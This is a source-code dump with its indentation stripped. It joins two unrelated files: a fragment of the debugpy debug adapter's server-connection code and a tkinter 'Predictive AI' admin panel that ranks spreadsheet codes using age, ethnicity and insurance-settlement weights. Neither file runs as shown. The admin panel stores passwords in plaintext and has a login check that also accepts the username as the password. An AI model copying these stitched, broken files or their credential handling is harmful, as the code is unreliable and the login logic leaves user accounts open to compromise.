def terminated_event(self, event):
self.channel.close()
def disconnect(self):
with _lock:
self.disconnected = True
if self.server is not None:
# If the disconnect happened while Server was being instantiated,
# we need to tell it, so that it can clean up via Session.finalize().
# It will also take care of deregistering the connection in that case.
self.server.disconnect()
elif self in _connections:
_connections.remove(self)
_connections_changed.set()
def attach_to_session(self, session):
"""Attaches this server to the specified Session as a Server component.
Raises ValueError if the server already belongs to some session.
"""
with _lock:
if self.server is not None:
raise ValueError
log.info("Attaching {0} to {1}", self, session)
self.server = Server(session, self)
class Server(components.Component):
"""Handles the debug server side of a debug session."""
message_handler = components.Component.message_handler
class Capabilities(components.Capabilities):
PROPERTIES = {
"supportsCompletionsRequest": False,
"supportsConditionalBreakpoints": False,
"supportsConfigurationDoneRequest": False,
"supportsDataBreakpoints": False,
"supportsDelayedStackTraceLoading": False,
"supportsDisassembleRequest": False,
"supportsEvaluateForHovers": False,
"supportsExceptionInfoRequest": False,
"supportsExceptionOptions": False,
"supportsFunctionBreakpoints": False,
"supportsGotoTargetsRequest": False,
"supportsHitConditionalBreakpoints": False,
"supportsLoadedSourcesRequest": False,
"supportsLogPoints": False,
"supportsModulesRequest": False,
"supportsReadMemoryRequest": False,
"supportsRestartFrame": False,
"supportsRestartRequest": False,
"supportsSetExpression": False,
"supportsSetVariable": False,
"supportsStepBack": False,
"supportsStepInTargetsRequest": False,
"supportsTerminateDebuggee": False,
"supportsTerminateRequest": False,
"supportsTerminateThreadsRequest": False,
"supportsValueFormattingOptions": False,
"exceptionBreakpointFilters": [],
"additionalModuleColumns": [],
"supportedChecksumAlgorithms": [],
}
def __init__(self, session, connection):
assert connection.server is None
with session:
assert not session.server
super(Server, self).__init__(session, channel=connection.channel)
self.connection = connection
assert self.session.pid is None
if self.session.launcher and self.session.launcher.pid != self.pid:
log.info(
"Launcher reported PID={0}, but server reported PID={1}",
self.session.launcher.pid,
self.pid,
)
self.session.pid = self.pid
session.server = self
@property
def pid(self):
"""Process ID of the debuggee process, as reported by the server."""
return self.connection.pid
@property
def ppid(self):
"""Parent process ID of the debuggee process, as reported by the server."""
return self.connection.ppid
def initialize(self, request):
assert request.is_request("initialize")
self.connection.authenticate()
request = self.channel.propagate(request)
request.wait_for_response()
self.capabilities = self.Capabilities(self, request.response)
# Generic request handler, used if there's no specific handler below.
@message_handler
def request(self, request):
# Do not delegate requests from the server by default. There is a security
# boundary between the server and the adapter, and we cannot trust arbitrary
# requests sent over that boundary, since they may contain arbitrary code
# that the client will execute - e.g. "runInTerminal". The adapter must only
# propagate requests that it knows are safe.
raise request.isnt_valid(
"Requests from the debug server to the client are not allowed."
)
# Generic event handler, used if there's no specific handler below.
@message_handler
def event(self, event):
self.client.propagate_after_start(event)
@message_handler
def initialized_event(self, event):
# pydevd doesn't send it, but the adapter will send its own in any case.
pass
@message_handler
def process_event(self, event):
# If there is a launcher, it's handling the process event.
if not self.launcher:
self.client.propagate_after_start(event)
@message_handler
def continued_event(self, event):
# https://github.com/microsoft/ptvsd/issues/1530
#
# DAP specification says that a step request implies that only the thread on
# which that step occurred is resumed for the duration of the step. However,
# for VS compatibility, pydevd can operate in a mode that resumes all threads
# instead. This is set according to the value of "steppingResumesAllThreads"
# in "launch" or "attach" request, which defaults to true. If explicitly set
# to false, pydevd will only resume the thread that was stepping.
#
# To ensure that the client is aware that other threads are getting resumed in
# that mode, pydevd sends a "continued" event with "allThreadsResumed": true.
# when responding to a step request. This ensures correct behavior in VSCode
# and other DAP-conformant clients.
#
# On the other hand, VS does not follow the DAP specification in this regard.
# When it requests a step, it assumes that all threads will be resumed, and
# does not expect to see "continued" events explicitly reflecting that fact.
# If such events are sent regardless, VS behaves erratically. Thus, we have
# to suppress them specifically for VS.
if self.client.client_id not in ("visualstudio", "vsformac"):
self.client.propagate_after_start(event)
@message_handler
def exited_event(self, event):
# If there is a launcher, it's handling the exit code.
if not self.launcher:
self.client.propagate_after_start(event)
@message_handler
def terminated_event(self, event):
# Do not propagate this, since we'll report our own.
self.channel.close()
def detach_from_session(self):
with _lock:
self.is_connected = False
self.channel.handlers = self.connection
self.channel.name = self.channel.stream.name = str(self.connection)
self.connection.server = None
def disconnect(self):
with _lock:
_connections.remove(self.connection)
_connections_changed.set()
super(Server, self).disconnect()
def serve(host="127.0.0.1", port=0):
global listener
listener = sockets.serve("Server", Connection, host, port)
return listener.getsockname()
def stop_serving():
try:
listener.close()
except Exception:
log.swallow_exception(level="warning")
def connections():
with _lock:
return list(_connections)
def wait_for_connection(session, predicate, timeout=None):
"""Waits until there is a server with the specified PID connected to this adapter,
and returns the corresponding Connection.
If there is more than one server connection already available, returns the oldest
one.
"""
def wait_for_timeout():
time.sleep(timeout)
wait_for_timeout.timed_out = True
with _lock:
_connections_changed.set()
wait_for_timeout.timed_out = timeout == 0
if timeout:
thread = threading.Thread(
target=wait_for_timeout, name="servers.wait_for_connection() timeout"
)
thread.daemon = True
thread.start()
if timeout != 0:
log.info("{0} waiting for connection from debug server...", session)
while True:
with _lock:
_connections_changed.clear()
conns = (conn for conn in _connections if predicate(conn))
conn = next(conns, None)
if conn is not None or wait_for_timeout.timed_out:
return conn
_connections_changed.wait()
def wait_until_disconnected():
"""Blocks until all debug servers disconnect from the adapter.
If there are no server connections, waits until at least one is established first,
before waiting for it to disconnect.
"""
while True:
_connections_changed.wait()
with _lock:
_connections_changed.clear()
if not len(_connections):
return
def dont_wait_for_first_connection():
"""Unblocks any pending wait_until_disconnected() call that is waiting on the
first server to connect.
"""
with _lock:
_connections_changed.set()
def inject(pid, debugpy_args):
host, port = listener.getsockname()
cmdline = [
sys.executable,
compat.filename(os.path.dirname(debugpy.__file__)),
"--connect",
host + ":" + str(port),
]
if adapter.access_token is not None:
cmdline += ["--adapter-access-token", adapter.access_token]
cmdline += debugpy_args
cmdline += ["--pid", str(pid)]
log.info("Spawning attach-to-PID debugger injector: {0!r}", cmdline)
try:
injector = subprocess.Popen(
cmdline,
bufsize=0,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
except Exception as exc:
log.swallow_exception(
"Failed to inject debug server into process with PID={0}", pid
)
raise messaging.MessageHandlingError(
fmt(
"Failed to inject debug server into process with PID={0}: {1}", pid, exc
)
)
# We need to capture the output of the injector - otherwise it can get blocked
# on a write() syscall when it tries to print something.
def capture_output():
while True:
line = injector.stdout.readline()
if not line:
break
log.info("Injector[PID={0}] output:\n{1}", pid, line.rstrip())
log.info("Injector[PID={0}] exited.", pid)
thread = threading.Thread(
target=capture_output, name=fmt("Injector[PID={0}] output", pid)
)
thread.daemon = True
thread.start()
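# Usage sketch (added; not taken from the debugpy sources): wait_for_connection()
# filters connections with an arbitrary predicate and returns None on timeout,
# so a caller that knows the debuggee PID could do something like
#
#   conn = wait_for_connection(session, lambda c: c.pid == some_pid, timeout=10)
#   if conn is None:
#       ...  # no matching server connected in time
#
# where `some_pid` is a placeholder for the expected process ID.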
|
AdminPanel.py
|
#import modules
from os import curdir
from tkinter import *
import os
import tkinter.filedialog
import sys
import numpy as np
from styleframe import StyleFrame, utils
import pandas as pd
import csv
from tkmagicgrid import *
from tkinter import ttk
import threading
import json
from pathlib import Path
from storykey import storykey
from tire import GeneticRisk
from multiprocessing import Process
class ProcessParallel(object):
"""
To Process the functions parallely
"""
def __init__(self, *jobs):
"""
"""
self.jobs = jobs
self.processes = []
def fork_processes(self):
"""
Creates the process objects for given function deligates
"""
for job in self.jobs:
proc = Process(target=job)
self.processes.append(proc)
def start_all(self):
"""
Starts the functions process all together.
"""
for proc in self.processes:
proc.start()
def join_all(self):
"""
Waits untill all the functions executed.
"""
for proc in self.processes:
proc.join()
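# Usage sketch (added) for ProcessParallel; `job_a` and `job_b` are placeholder
# callables, not functions defined in this file:
#
#   runner = ProcessParallel(job_a, job_b)
#   runner.fork_processes()
#   runner.start_all()
#   runner.join_all()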
try:
sys.stdout.write("\n")
sys.stdout.flush()
except:
class dummyStream:
''' dummyStream behaves like a stream but does nothing. '''
def __init__(self): pass
def write(self,data): pass
def read(self,data): pass
def flush(self): pass
def close(self): pass
# and now redirect all default streams to this dummyStream:
sys.stdout = dummyStream()
sys.stderr = dummyStream()
sys.stdin = dummyStream()
sys.__stdout__ = dummyStream()
sys.__stderr__ = dummyStream()
sys.__stdin__ = dummyStream()
# Designing window for registration
def register():
global register_screen
register_screen = Toplevel(main_screen)
ico_path = curdir+"\media\my_icon.ico"
register_screen.iconbitmap(ico_path)
register_screen.title("Register")
register_screen.geometry("300x250")
global username
global password
global username_entry
global password_entry
global username_data
global password_data
global start_code
global end_code
global username_data
global password_data
global start_code
global end_code
username_data = StringVar()
password_data = StringVar()
start_code = StringVar()
end_code = StringVar()
username = StringVar()
password = StringVar()
Label(register_screen, text="Please enter details below", bg="blue").pack()
Label(register_screen, text="").pack()
username_lable = Label(register_screen, text="Username * ")
username_lable.pack()
username_entry = Entry(register_screen, textvariable=username)
username_entry.pack()
password_lable = Label(register_screen, text="Password * ")
password_lable.pack()
password_entry = Entry(register_screen, textvariable=password, show='*')
password_entry.bind('<Return>', register_user)
password_entry.pack()
Label(register_screen, text="").pack()
Button(register_screen, text="Register", width=10, height=1, bg="blue", command = register_user).pack()
# Designing window for login
def login():
global login_screen
login_screen = Toplevel(main_screen)
login_screen.title("Login")
login_screen.geometry("300x250")
ico_path = curdir+"\media\my_icon.ico"
login_screen.iconbitmap(ico_path)
Label(login_screen, text="Please enter details below to login").pack()
Label(login_screen, text="").pack()
global username_verify
global password_verify
username_verify = StringVar()
password_verify = StringVar()
global username_login_entry
global password_login_entry
Label(login_screen, text="Username * ").pack()
username_login_entry = Entry(login_screen, textvariable=username_verify)
username_login_entry.pack()
Label(login_screen, text="").pack()
Label(login_screen, text="Password * ").pack()
password_login_entry = Entry(login_screen, textvariable=password_verify, show= '*')
password_login_entry.bind('<Return>', login_verify)
password_login_entry.pack()
Label(login_screen, text="").pack()
Button(login_screen, text="Login", width=10, height=1, command = login_verify).pack()
# Implementing event on register button
def register_user(event=None):
username_info = username.get()
password_info = password.get()
file = open("user_credential_database/" + username_info, "w")
file.write(username_info + "\n")
file.write(password_info)
file.close()
username_entry.delete(0, END)
password_entry.delete(0, END)
Label(register_screen, text="Registration Success", fg="green", font=("calibri", 11)).pack()
register_screen.after(700,register_screen.destroy)
# Implementing event on login button
def login_verify(event=None):
username1 = username_verify.get()
password1 = password_verify.get()
username_login_entry.delete(0, END)
password_login_entry.delete(0, END)
current_directory = os.getcwd()
user_credential_directory = current_directory + '/'+"user_credential_database/"
list_of_files = os.listdir(user_credential_directory)
if username1 in list_of_files:
file1 = open(user_credential_directory + username1, "r")
verify = file1.read().splitlines()
if password1 in verify:
login_sucess()
else:
password_not_recognised()
else:
user_not_found()
# Designing popup for login success
def login_sucess():
global login_success_screen
login_success_screen = Toplevel(login_screen)
ico_path = curdir+"\media\my_icon.ico"
login_success_screen.iconbitmap(ico_path)
login_success_screen.title("Success")
login_success_screen.geometry("150x100")
Label(login_success_screen, text="Login Success").pack()
Button(login_success_screen, text="OK", command=del_and_open).pack()
login_success_screen.after(500, del_and_open)
def del_and_open():
delete_login_success()
application_window()
class application_window:
def __init__(self):
self.root = Tk()
frame = self.root
ico_path = curdir+"\media\my_icon.ico"
frame.iconbitmap(ico_path)
frame.title("Predictive AI Application Window")
frame.geometry("1024x1024")
self.current_dir = curdir
b1 = tkinter.Button(frame, text='Select Master Sheet',width=15, height=2, command=self.get_path_master).place(x=30, y=50)
b2 = tkinter.Button(frame, text='Select Multiple Test Sheets (use ctrl + click to select)',width=40, height=2, command=self.get_path_test).place(x=300,y=50)
#las - Label(frame,)
self.progressbar = ttk.Progressbar(frame, mode='determinate',cursor='spider',length=300)
self.progressbar.grid(column=1, row=0, sticky=W)
self.progressbar["maximum"] = 100
self.progressbar["value"] = 0
"""photo_login = PhotoImage(file = curdir+"\predict.png")
Button(text = ' Predict Now!', height="80", width="200", image = photo_login,
compound = LEFT, command = lambda:self.start_submit_thread(None)).place(x=90,y=150)"""
#ttk.Button(frame, text="Predict Now",
b3 = tkinter.Button(frame, text='Predict Now!',width=15, height=2 ,command= lambda:self.start_submit_thread(None)).place(x=90,y=150)
"b2.pack(fill='x')"
def get_path_master(self):
if not os.path.exists('AI External-Outputs/path_info.txt'):
check_from = curdir
else:
file = open("AI External-Outputs/path_info.txt","r")
for lines in file.read().splitlines():
if lines[0] == "M":
check_from = os.path.dirname(lines[1:])
file.close()
self.master_sheet_filepath = tkinter.filedialog.askopenfilename(parent=self.root, initialdir= check_from ,title='Please Choose Master Sheet',filetypes=[('Excel File', '.xlsx'),('CSV Excel file', '.csv')])
def get_path_test(self):
if not os.path.exists('AI External-Outputs/path_info.txt'):
check_from = curdir
else:
file = open("AI External-Outputs/path_info.txt","r")
for lines in file.read().splitlines():
if lines[0] == "T":
check_from = os.path.dirname(lines[1:])
file.close()
self.test_sheet_filepaths = list(tkinter.filedialog.askopenfilenames(parent=self.root, initialdir=check_from,title='Please Choose Test Sheet',filetypes=[('Excel File', '.xlsx'),('CSV Excel file', '.csv')]))
"""print(f)"""
def get_prediction(self):
def read_master_sheet(filepath):
sf = StyleFrame.read_excel(filepath , read_style=True, use_openpyxl_styles=False)
return sf
def df_column_uniquify(df):
df_columns = df.columns
new_columns = []
for item in df_columns:
counter = 0
newitem = item
while newitem in new_columns:
counter += 1
newitem = "{}_{}".format(item, counter)
new_columns.append(newitem)
df.columns = new_columns
return df
def read_data(filepath):
df = pd.read_excel(filepath)
return df
def get_standard_matrix(sf):
f = open('Value-json/hyperparam.json')
hyperparam = json.load(f)
"""
def only_cells_with_red_text(cell):
if cell!=cell:
return hyperparam['empty']
if cell.style.bg_color in {utils.colors.red, 'FFFF0000'}:
return 150
if cell.style.font_color in {utils.colors.green, 'FF00B050'}:
return hyperparam['green']
elif cell.style.font_color in {utils.colors.yellow, '00FFFF00'}:
return hyperparam['yellow']
elif cell.style.font_color in {utils.colors.purple, '800080'}:
return hyperparam['purple']
elif cell.style.font_color in {utils.colors.red, 'FFFF0000'}:
return hyperparam['red']
elif cell.style.font_color in {utils.colors.blue, 'FF0070C0'}:
return hyperparam['blue']
elif cell.style.font_color in {utils.colors.black, '00000000'}:
return hyperparam['black']
else:
return 100
def only_cells_with_red_text_emp(cell):
if cell!=cell:
return 0
if cell.style.bg_color in {utils.colors.red, 'FFFF0000'}:
return 150
if cell.style.font_color in {utils.colors.green, 'FF00B050'}:
return hyperparam['green']
elif cell.style.font_color in {utils.colors.yellow, '00FFFF00'}:
return hyperparam['yellow']
elif cell.style.font_color in {utils.colors.purple, '800080'}:
return hyperparam['purple']
elif cell.style.font_color in {utils.colors.red, 'FFFF0000'}:
return hyperparam['red']
elif cell.style.font_color in {utils.colors.blue, 'FF0070C0'}:
return hyperparam['blue']
elif cell.style.font_color in {utils.colors.black, '00000000'}:
return hyperparam['black']
else:
return 100
"""
def only_cells_with_red_text(cell):
if cell!=cell:
return hyperparam['empty']
elif '#' in str(cell.value) and '(' in str(cell.value):
check = cell.value
check = check[:-1]
cert = check.split('(')
cer = float(cert[1])
return cer
else:
if '(' in str(cell.value):
if cell.style.bg_color in {utils.colors.red, 'FFFF0000'}:
return 150
if cell.style.font_color in {utils.colors.green, 'FF00B050'}:
check = cell.value
check = check[:-1]
cert = check.split('(')
cer = cert[1].split(',')
if cer[0] == 'C':
return hyperparam['green']
elif cer[0] == 'V':
return float(cer[1])
elif cell.style.font_color in {utils.colors.yellow, '00FFFF00'}:
check = cell.value
check = check[:-1]
cert = check.split('(')
cer = cert[1].split(',')
if cer[0] == 'C':
return hyperparam['yellow']
elif cer[0] == 'V':
return float(cer[1])
elif cell.style.font_color in {utils.colors.purple, '800080'}:
check = cell.value
check = check[:-1]
cert = check.split('(')
cer = cert[1].split(',')
#print(cer)
if cer[0] == 'C':
return hyperparam['purple']
elif cer[0] == 'V':
return float(cer[1])
elif cell.style.font_color in {utils.colors.red, 'FFFF0000'}:
check = cell.value
check = check[:-1]
cert = check.split('(')
cer = cert[1].split(',')
if cer[0] == 'C':
return hyperparam['red']
elif cer[0] == 'V':
return float(cer[1])
elif cell.style.font_color in {utils.colors.blue, 'FF0070C0'}:
check = cell.value
check = check[:-1]
cert = check.split('(')
cer = cert[1].split(',')
if cer[0] == 'C':
return hyperparam['blue']
elif cer[0] == 'V':
return float(cer[1])
elif cell.style.font_color in {utils.colors.black, '00000000'}:
check = cell.value
check = check[:-1]
cert = check.split('(')
cer = cert[1].split(',')
if cer[0] == 'C':
return hyperparam['black']
elif cer[0] == 'V':
return float(cer[1])
else:
check = cell.value
check = check[:-1]
cert = check.split('(')
cer = cert[1].split(',')
if cer[0] == 'C':
return hyperparam['black']
elif cer[0] == 'V':
return float(cer[1])
else:
return 0.00000001
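            # Summary (added) of the cell encoding handled by the two mappers
            # above and below:
            #   * empty cells map to hyperparam['empty'] here and to 0 in the
            #     *_emp variant;
            #   * a red background marks a qualifying row and maps to 150;
            #   * cells ending in "(C,...)"-style markup take the weight assigned
            #     to their font colour in Value-json/hyperparam.json;
            #   * cells ending in "(V,<number>)" carry that number as an explicit
            #     weight, and "#...(<number>)" cells (above only) return the
            #     parenthesised number directly;
            #   * anything else falls back to a tiny epsilon so it barely
            #     contributes to the dot products computed later.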
def only_cells_with_red_text_emp(cell):
if cell!=cell:
return 0
elif '(' in str(cell.value):
if cell.style.bg_color in {utils.colors.red, 'FFFF0000'}:
return 150
if cell.style.font_color in {utils.colors.green, 'FF00B050'}:
check = cell.value
check = check[:-1]
cert = check.split('(')
cer = cert[1].split(',')
if cer[0] == 'C':
return hyperparam['green']
elif cer[0] == 'V':
return float(cer[1])
elif cell.style.font_color in {utils.colors.yellow, '00FFFF00'}:
check = cell.value
check = check[:-1]
cert = check.split('(')
cer = cert[1].split(',')
if cer[0] == 'C':
return hyperparam['yellow']
elif cer[0] == 'V':
return float(cer[1])
elif cell.style.font_color in {utils.colors.purple, '800080'}:
check = cell.value
check = check[:-1]
cert = check.split('(')
cer = cert[1].split(',')
if cer[0] == 'C':
return hyperparam['purple']
elif cer[0] == 'V':
return float(cer[1])
elif cell.style.font_color in {utils.colors.red, 'FFFF0000'}:
check = cell.value
check = check[:-1]
cert = check.split('(')
cer = cert[1].split(',')
if cer[0] == 'C':
return hyperparam['red']
elif cer[0] == 'V':
return float(cer[1])
elif cell.style.font_color in {utils.colors.blue, 'FF0070C0'}:
check = cell.value
check = check[:-1]
cert = check.split('(')
cer = cert[1].split(',')
if cer[0] == 'C':
return hyperparam['blue']
elif cer[0] == 'V':
return float(cer[1])
elif cell.style.font_color in {utils.colors.black, '00000000'}:
check = cell.value
check = check[:-1]
cert = check.split('(')
cer = cert[1].split(',')
if cer[0] == 'C':
return hyperparam['black']
elif cer[0] == 'V':
return float(cer[1])
else:
check = cell.value
check = check[:-1]
cert = check.split('(')
cer = cert[1].split(',')
if cer[0] == 'C':
return hyperparam['black']
elif cer[0] == 'V':
return float(cer[1])
else:
return 0.0000001
sf_2 = StyleFrame(sf.applymap(only_cells_with_red_text))
sf_3 = StyleFrame(sf.applymap(only_cells_with_red_text_emp))
# passing a tuple to pandas.dropna is deprecated since pandas 0.23.0, but this can be
# avoided by simply calling dropna twice, once with axis=0 and once with axis=1
def get_sum(sf_3):
sf_3.to_excel(curdir+'/AI Internal-Outputs/output_0.xlsx').save()
df = read_data(curdir+'/AI Internal-Outputs/output_0.xlsx')
code_dict = []
lent = 0
for col in df.columns:
if 'Code' in col:
lent = lent + 1
for i in range(1,lent):
code_dict.append("Code "+str(i))
qf=[]
df = df.fillna(0)
for col in code_dict:
if any(i == 150 for i in df[col].values):
qf.append(col)
qualifying_dict = {}
df = df.iloc[3:,6:]
for col_n in qf:
idx = int(col_n.split()[1])
df_n = df.iloc[:,idx-1]
qualifying_dict[col_n] = df_n.values
standard_matrix = df.values
def sumColumn(matrix):
return np.sum(matrix, axis=0)
#sum_std_mat = sumColumn(standard_matrix)
return standard_matrix
#print(qualifying_dict)
sf_2.to_excel(curdir+'/AI Internal-Outputs/output.xlsx').save()
df = read_data(curdir+'/AI Internal-Outputs/output.xlsx')
code_dict = []
lent = 0
for col in df.columns:
if 'Code' in col:
lent = lent + 1
#print(lent)
for i in range(1,lent):
code_dict.append("Code "+str(i))
qf=[]
df = df.fillna(0)
for col in code_dict:
if any(i == 150 for i in df[col].values):
qf.append(col)
qualifying_dict = {}
df = df.iloc[3:,6:]
for col_n in qf:
idx = int(col_n.split()[1])
df_n = df.iloc[:,idx-1]
qualifying_dict[col_n] = df_n.values
standard_matrix = df.values
print(standard_matrix)
#print(standard_matrix)
return standard_matrix,qualifying_dict,get_sum(sf_3),lent
def get_age_decision(age,lent):
code_dict = []
for i in range(1,lent):
code_dict.append("Code "+str(i))
dicte = dict.fromkeys(code_dict, 0)
prediction_codes = []
if age<35:
dicte['Code 1']=120
prediction_codes.append("Code 1")
if 30<age<50:
dicte['Code 2']=100
prediction_codes.append("Code 2")
if 10<age<58:
dicte['Code 3']=100
dicte['Code 5']=100
dicte['Code 7']=100
dicte['Code 13']=100
dicte['Code 14']=100
dicte['Code 15']=100
prediction_codes.append("Code 3")
prediction_codes.append("Code 5")
prediction_codes.append("Code 7")
prediction_codes.append("Code 13")
prediction_codes.append("Code 14")
prediction_codes.append("Code 15")
if age<55:
dicte['Code 12']=100
prediction_codes.append("Code 12")
if 10<age<68:
dicte['Code 16']=100
prediction_codes.append("Code 16")
if age<45:
dicte['Code 18']=100
prediction_codes.append("Code 45")
if 20<age<52:
dicte['Code 28']=100
prediction_codes.append("Code 28")
if 45<age<58:
dicte['Code 30']=100
dicte['Code 31']=100
prediction_codes.append("Code 30")
prediction_codes.append("Code 31")
if 12<age<60:
dicte['Code 33']=100
prediction_codes.append("Code 33")
if 12<age<58:
dicte['Code 35']=100
prediction_codes.append("Code 35")
if 10<age<60:
dicte['Code 37']=100
dicte['Code 38']=100
prediction_codes.append("Code 37")
prediction_codes.append("Code 38")
if age:
prediction_codes.append("Code 4")
prediction_codes.append("Code 6")
prediction_codes.append("Code 8")
prediction_codes.append("Code 9")
prediction_codes.append("Code 10")
prediction_codes.append("Code 11")
prediction_codes.append("Code 17")
prediction_codes.append("Code 19")
prediction_codes.append("Code 20")
prediction_codes.append("Code 21")
prediction_codes.append("Code 22")
prediction_codes.append("Code 23")
prediction_codes.append("Code 24")
prediction_codes.append("Code 25")
prediction_codes.append("Code 26")
prediction_codes.append("Code 27")
prediction_codes.append("Code 29")
prediction_codes.append("Code 32")
prediction_codes.append("Code 34")
prediction_codes.append("Code 36")
dicte["Code 4"]=100
dicte["Code 6"]=100
dicte["Code 8"]=100
dicte["Code 9"]=100
dicte["Code 10"]=100
dicte["Code 11"]=100
dicte["Code 17"]=100
dicte["Code 19"]=100
dicte["Code 20"]=100
dicte["Code 21"]=100
dicte["Code 22"]=100
dicte["Code 23"]=100
dicte["Code 24"]=100
dicte["Code 25"]=100
dicte["Code 26"]=100
dicte["Code 27"]=100
dicte["Code 29"]=100
dicte["Code 32"]=100
dicte["Code 34"]=100
dicte["Code 36"]=100
return dicte,prediction_codes
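        # Added note: get_age_decision returns (dicte, prediction_codes) where
        # dicte maps every code to an age weight (0 = outside the allowed age
        # window) and prediction_codes lists the codes considered for this age.
        # When the age logic is active, codes left at weight 0 are excluded from
        # the ranking further below.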
def get_percentile(score_arr,sum_std_mat,idx_file,df_attempt):
"""
ptile = [ (len(list(np.where(np.array(x)<=i)[0]))/len(x))*100 for i in x]
"""
cnt = 0
master_attempt = np.where(sum_std_mat ==0,0,1)
score_mul = df_attempt.T @ master_attempt
score_mul = [i * 120 for i in score_mul]
unique_score = score_mul
max_v = np.max(score_arr)
inx = max_v
comp_std = []
for inx,val in enumerate(score_arr):
try:
bck = (val/unique_score[idx_file[-inx-1]])*100
except:
bck = 127.7789
bck = bck/10
comp_std.append(bck)
if val>0:
cnt+=1
inx = val
if max_v == 0:
max_v = 1
mulk = (max_v - inx)/max_v
scorecard = [(((i/max_v)*100)-(cnt*mulk)*2.2132) for i in score_arr]
return scorecard,comp_std
def get_qualify(attempt,qualify_dict,lent):
code_dict = []
for i in range(1,lent):
code_dict.append("Code "+str(i))
hell_dict = dict.fromkeys(code_dict, 1)
for key,val in qualify_dict.items():
check = np.where(np.logical_and(val==150, attempt==1))[0]
#print(key)
#print(check)
if len(check)>0:
hell_dict[key]= 1
else:
hell_dict[key]= -100000
#print(hell_dict)
return hell_dict
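        # Added note: get_qualify keeps a code at weight 1 only if the attempt
        # hit at least one of its qualifying rows (cells valued 150 in the master
        # matrix); otherwise the code gets -100000, which later pushes it out of
        # contention whenever the qualifying criteria logic is active.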
def get_test_output(df, col_number):
#df = read_data(filepath)
chl = 0
chlt = 0
for inx,rows in df.iterrows():
if rows['Sub-Feature'] == "external factor":
chl = inx
for inx,rows in df.iterrows():
if rows['Sub-Feature'] == "DropDowns":
chlt = inx
df_check = df.iloc[chl+1:chlt-7]
df = df[[col_number]]
ethinicity = df.iloc[4:5].values[0]
age = df.iloc[5:6].values[0]
age = age[0]
ethinicity = str(ethinicity[0])
df_check = df_check.fillna(0)
#print(df_check)
to_check_array = df_check[col_number].values
#print(to_check_array)
return to_check_array,age,ethinicity
def get_top_5_predictions(to_check_array,age,standard_matrix,qualifying_dict,sum_std_mat,ethnicity,col_number,lent,mat_master_dict,to_check_dict):
""" dicte,prediction_codes = get_age_decision(age)
to_check_array_match = np.where(to_check_array == 0, 0, 1)
tat_val_match = np.dot(to_check_array_match.T,standard_matrix)
for idx,val in enumerate(tat_val_match):
code_idx = "Code "+str(idx+1)
tat_val_match[idx] = tat_val_match[idx]*dicte[code_idx]
to_check_array_n_match = np.where(to_check_array == 0, -0.001, 0)
tat_val_n_match = np.dot(to_check_array_n_match.T,standard_matrix)
for idx,val in enumerate(tat_val_n_match):
code_idx = "Code "+str(idx+1)
tat_val_n_match[idx] = tat_val_n_match[idx]*dicte[code_idx]
tat_val = tat_val_match + tat_val_n_match
top_2_idx = np.argsort(tat_val)[-5:]
top_2_val = [tat_val[i] for i in reversed(top_2_idx)]
accuarcy = [val/sum(top_2_val) for val in top_2_val]
predictions = ["Code " + str(idx+1) for idx in reversed(top_2_idx)]
return predictions,accuarcy,get_scores(top_2_val) """
def mydot(v1, v2):
return sum([x*y for x,y in zip(v1, v2)])
def matmulvec(M, v):
return [mydot(r,v) for r in M]
def matprod(x, y):
I = range(len(x))
J = range(len(y[0]))
K = range(len(x[0]))
matmul = []
for i in I:
matmulprod = []
for j in J:
for k in K:
matmulprod.append(sum(x[i][k]*y[k][j]))
matmul.append(matmulprod)
return matmul
def py_matmul(a, b):
ca = len(a)
ra = 1
rb, cb = b.shape
assert ca == rb, f"{ca} != {rb}"
output = np.zeros(shape=(ra, cb))
for i in range(ra):
for j in range(cb):
for k in range(rb):
output[i, j] += a[i, k] * b[k, j]
return output
consumption_dict = {}
consumption_dict['Finetuning Logic'] = "Not Consumed"
consumption_dict['Qualifying criteria'] = "Not Used"
consumption_dict['Age logic'] = "Not Consumed"
consumption_dict['Insurance settlement history'] = "Not Consumed"
consumption_dict['Ethnicity Logic'] = "Not Consumed"
consumption_dict['Layer Logic'] = "Not Consumed"
f = open('Value-json/hyperparam.json')
hyperparam = json.load(f)
st = standard_matrix.T
mat_dict = []
to_check_array = np.where(to_check_array == 0, hyperparam['alpha'], 1)
rnums = []
for inx,num in enumerate(to_check_array):
rnum = "(R{},{})".format(inx+5,num)
rnums.append(rnum)
to_check_dict[col_number] = rnums
with open("Input Sheets/mat_dict.txt",'r') as file:
line = file.read()
inner_list = [elt.strip() for elt in line.split(',')]
#print(inner_list)
f = open('Value-json/logic_activation.json')
activation = json.load(f)
if activation['matmul_logic'] == "active":
for number in inner_list:
if col_number == int(number):
for ind in range(len(st)):
code_idx = "C"+str(ind+1)
ajio = np.multiply(to_check_array,st[ind])
tax_p = []
for aj in range(len(ajio)):
tax_p.append('{}(R{},{})'.format(ajio[aj],aj+5,code_idx))
mat_dict.append(tax_p)
mat_master_dict[col_number] = np.array(mat_dict).T
standard_matrix = standard_matrix
for inx in range(len(to_check_array)):
if to_check_array[inx] < 0:
#print(len(standard_matrix[inx]))
for idx,val in enumerate(standard_matrix[inx]):
if val < 0:
standard_matrix[inx][idx] = 0
#print(standard_matrix)
tat_val = np.dot(to_check_array.T,standard_matrix)
            dicte,prediction_codes = get_age_decision(age,lent)
qualify_dict = get_qualify(to_check_array,qualifying_dict,lent)
col_number =col_number
intial_logic = {}
for idx,val in enumerate(tat_val):
code_idx = "Code "+str(idx+1)
f = open('Value-json/logic_activation.json')
activation = json.load(f)
if qualify_dict[code_idx] <0:
if activation['qualifying_criteria'] == 'active':
consumption_dict['Qualifying criteria'] = "Used"
tat_val[idx] = -1000000
else:
pass
else:
if activation['age_logic'] == 'active':
if dicte[code_idx] == 0:
consumption_dict['Age logic'] = "Consumed"
tat_val[idx] = -1000000
else:
pass
else:
pass
intial_logic[code_idx] = tat_val[idx]
f = open('Value-json/logic_activation.json')
activation = json.load(f)
if activation['settlement_logic'] == 'active':
df = pd.read_excel(os.curdir + '/Logic Container/Insurance settlement history.xlsx')
for idx,rows in df.iterrows():
if rows['Age']!=rows['Age']:
break
else:
age_r = rows['Age'].split('-')
age_start = int(age_r[0])
age_end = int(age_r[1])
if age_start <= age <= age_end:
total = 0
val_arr = (rows[1:].values)
for val in val_arr:
if '#' in str(val):
pass
else:
total = total + val
for inx,score in enumerate(tat_val):
code_idx = "Code "+str(inx+1)
if inx!=3122239:
if '#' in str(rows[code_idx]):
pass
else:
prob = float(rows[code_idx])/float(total)
consumption_dict['Insurance settlement history'] = "Consumed"
tat_val[inx] = tat_val[inx] * prob
else:
continue
settlement_logic = {}
